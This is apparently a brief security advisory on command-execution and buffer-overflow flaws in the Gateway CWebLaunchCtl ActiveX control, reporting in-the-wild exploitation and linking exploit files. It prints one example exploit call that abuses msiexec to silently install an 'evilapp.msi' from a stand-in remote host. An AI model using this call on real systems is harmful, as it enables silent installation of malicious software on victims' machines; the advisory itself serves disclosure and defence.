Gateway CWebLaunchCtl ActiveX Control Command Execution and Remote Buffer Overflow Vulnerability

Gateway CWebLaunchCtl ActiveX Control Command Execution and Remote Buffer Overflow Vulnerability

The following example call to the vulnerable method demonstrates executing a local script:

obj.DoWebLaunch("","..\\..\\..\\..\\windows\\system32\\msiexec.exe", "","/i http://www.example.com/evilapp.msi /quiet");

UPDATE (March 26, 2008): The Symantec DeepSight Team has discovered that the issue affecting 'WebLaunch2.ocx' is being actively exploited in the wild.

A proof of concept for executing local scripts and an exploit for the buffer-overflow issue are available:

/data/vulnerabilities/exploits/27193.html
/data/vulnerabilities/exploits/27193_bof.html